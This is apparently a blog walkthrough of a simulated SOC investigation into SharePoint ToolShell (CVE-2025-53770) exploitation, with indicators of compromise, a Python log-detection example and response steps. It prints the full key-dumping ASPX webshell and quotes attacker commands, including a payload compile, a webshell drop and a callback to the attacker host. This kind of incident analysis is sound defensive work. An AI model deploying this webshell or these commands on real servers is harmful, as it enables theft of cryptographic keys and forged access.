June 22, 2026
CVE-2025-53770 (ToolShell) — SharePoint RCE Case Investigation | SOC Analysis Walkthrough
A real-world SOC alert investigation on LetsDefend — breaking down the ToolShell zero-day step by step.
Hitesh kumar
4 min read
Introduction
On July 22, 2025, a critical security alert was triggered on a SOC monitoring platform involving one of the most dangerous vulnerabilities of 2025 — CVE-2025-53770, publicly known as "ToolShell." This is a zero-day Remote Code Execution vulnerability affecting on-premises Microsoft SharePoint Server deployments with a CVSS score of 9.8 (Critical).
In this writeup, I will walk through how I investigated this alert on LetsDefend as a Level 1 SOC Analyst, what I found during the investigation, and how I reached my final verdict.
⚠️ This writeup is for educational purposes only. All investigation was performed in a controlled SOC simulation environment on LetsDefend.
What is CVE-2025-53770?
CVE-2025-53770 is a critical unauthenticated Remote Code Execution vulnerability in on-premises Microsoft SharePoint Server. It is an evolution of a previously patched flaw — CVE-2025-49704 — which was originally discovered at Pwn2Own Berlin 2025. The initial patches released during July 2025 Patch Tuesday were incomplete, allowing attackers to bypass them using advanced deserialization techniques and ViewState abuse.
The attack is simple but devastating. The attacker sends a crafted POST request to the /_layouts/15/ToolPane.aspx endpoint with a spoofed Referer header (/_layouts/SignOut.aspx) to bypass authentication — no credentials required. This results in the upload of a malicious ASPX webshell named spinstall0.aspx that extracts cryptographic secrets from the SharePoint server.
Affected versions:
- SharePoint Server 2016
- SharePoint Server 2019
- SharePoint Server Subscription Edition
Note: SharePoint Online (Microsoft 365) is NOT affected.
Alert Details
When the alert came in, here is what the data looked like:
Two things immediately stood out. First, the Referer header /_layouts/SignOut.aspx — this is the exact authentication bypass signature documented in CVE-2025-53770. Second, the Device Action was Allowed — meaning the payload reached the server without being blocked.
Step 1 — Identifying the Attack Type
The requested endpoint /_layouts/15/ToolPane.aspx, the spoofed Referer header, and the 7699-byte POST body are all documented indicators of CVE-2025-53770 exploitation. This is not an SQL injection, XSS, or LFI attack. This is an unauthenticated Remote Code Execution via unsafe deserialization — which falls under the category of Other in standard web attack classifications.
Step 2 — Traffic Direction Analysis
- Source IP: 107.191.58.76 → Public IP (Internet)
- Destination IP: 172.16.20.17 → Private IP (Internal company network)
Traffic direction: Internet → Company Network
An external threat actor was directly targeting the internal SharePoint server.
Step 3 — Checking if the Attack Was Successful
This is where the investigation got serious. I accessed the endpoint security logs for SharePoint01 and found the following evidence.
Finding 1 — Base64 Encoded Webshell
A Base64 encoded payload was discovered on the compromised host. After decoding it, I found the ToolShell signature webshell — an ASPX script designed to extract SharePoint cryptographic secrets:
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>
This script extracts the ValidationKey and DecryptionKey — the cryptographic secrets that protect SharePoint's authentication tokens. With these keys, an attacker can forge authentication tokens and access anything on the server.
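The request signature from Step 1 and the Base64 artifact from Finding 1 are the two things a detection script can check mechanically. The following Python is an added example (not from the original post or from LetsDefend): it scans constructed IIS-style log lines for the ToolPane.aspx/SignOut.aspx pattern and the spinstall0.aspx IOC, and decodes a Base64 artifact to look for the MachineKeySection strings the webshell above uses. The log field layout and the sample blob are assumptions made for the demo.

```python
import base64
import re

# Constructed IIS-style log lines (date time c-ip method uri status referer bytes), not from the post.
SAMPLE_LOG = """\
2025-07-22 10:14:03 107.191.58.76 POST /_layouts/15/ToolPane.aspx 200 /_layouts/SignOut.aspx 7699
2025-07-22 10:14:09 107.191.58.76 GET /_layouts/15/spinstall0.aspx 200 - 0
2025-07-22 10:15:11 10.0.0.5 GET /_layouts/15/ToolPane.aspx 200 /sites/hr/default.aspx 0
2025-07-22 10:16:40 10.0.0.8 POST /_layouts/15/ToolPane.aspx 200 /_layouts/15/settings.aspx 312
"""
TOOLPANE = re.compile(r"/_layouts/(?:15/)?toolpane\.aspx", re.I)
SIGNOUT = re.compile(r"/_layouts/(?:15/)?signout\.aspx", re.I)
WEBSHELL_MARKERS = ("MachineKeySection", "GetApplicationConfig", "ValidationKey", "DecryptionKey")

def classify_line(line):
    """Reasons one log line matches the ToolShell request pattern; [] when clean."""
    parts = line.split()
    if len(parts) < 8:
        return []
    method, uri, referer = parts[3], parts[4], parts[6]
    reasons = []
    if method.upper() == "POST" and TOOLPANE.search(uri) and SIGNOUT.search(referer):
        reasons.append("POST to ToolPane.aspx with SignOut.aspx Referer (auth-bypass signature)")
    if uri.lower().endswith("/spinstall0.aspx"):
        reasons.append("request for spinstall0.aspx (dropped-webshell IOC)")
    return reasons

def scan_log(text):
    """Scan a whole log; each hit records source IP, URI and why it matched."""
    hits = []
    for line in text.splitlines():
        reasons = classify_line(line)
        if reasons:
            parts = line.split()
            hits.append({"src": parts[2], "uri": parts[4], "reasons": reasons})
    return hits

def decode_and_check(b64_blob):
    """Decode a Base64 artifact and list the webshell markers it contains; (None, []) if not Base64."""
    try:
        text = base64.b64decode(b64_blob, validate=True).decode("utf-8", errors="replace")
    except ValueError:
        return None, []
    return text, [m for m in WEBSHELL_MARKERS if m in text]

# Constructed artifact: a fragment shaped like the page's webshell, encoded here for the demo.
SAMPLE_B64 = base64.b64encode(
    b'<script runat="server">var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");'
    b'var gac = mkt.GetMethod("GetApplicationConfig");Response.Write(cg.ValidationKey);</script>'
).decode()
```

The benign POST to ToolPane.aspx from 10.0.0.8 is deliberately included: an admin editing a page legitimately hits that endpoint, so the Referer check is what separates noise from the bypass.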
Finding 2 — Payload Compiled on Victim Machine
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
The attacker used the .NET compiler (csc.exe) already present on the Windows server to compile a custom malicious executable directly on the victim machine. This confirms the attacker had full code execution on SharePoint01.
Finding 3 — Persistent Webshell Dropped
"C:\Windows\System32\cmd.exe" /c echo ... > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
The attacker wrote spinstall0.aspx to the SharePoint LAYOUTS directory — the exact IOC (Indicator of Compromise) documented for CVE-2025-53770. This establishes persistence on the server.
Finding 4 — C2 Callback Confirmed
powershell.exe -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Network activity showed the compromised server reaching back to http://107.191.58.76/payload.exe — the same IP as the attacker — confirming active Command and Control communication for further payload delivery.
Step 4 — Artifacts Logged
Value / Type / Comment:
- 107.191.58.76 (IP Address) — Attacker source IP
- /_layouts/15/ToolPane.aspx (URL) — Exploited endpoint
- spinstall0.aspx (Other) — Dropped webshell — signature IOC
- C:\Windows\Temp\payload.exe (Other) — Malicious executable compiled on victim
- http://107.191.58.76/payload.exe (URL) — C2 callback URL
Final Verdict
True Positive — Attack Successful 🔴
All four stages of the attack were confirmed — authentication bypass, webshell deployment, payload execution, and C2 communication. The attacker achieved full Remote Code Execution on an internal SharePoint server with no credentials.
Actions Taken
- Alert escalated to Tier 2 for advanced incident response
- Compromised host SharePoint01 isolated from the network
- Source IP 107.191.58.76 flagged for firewall block
- SharePoint MachineKeys rotation recommended
- Microsoft's official CVE-2025-53770 security patch application recommended
Key Takeaways
1. Always decode Base64 artifacts — the real payload is always hidden inside. Decoding it revealed the exact webshell and confirmed the attack type.
2. Referer header spoofing is a real attack technique — a single crafted HTTP header was enough to bypass SharePoint authentication entirely.
3. spinstall0.aspx = ToolShell signature IOC — if you ever see this filename in a SharePoint LAYOUTS directory, treat it as confirmed compromise immediately.
4. C2 callbacks confirm successful exploitation — outbound connections back to the attacker IP are the clearest sign that a system is fully compromised.
5. Device Action: Allowed does not mean safe — the firewall let this through. Detection and response at the endpoint level saved the day.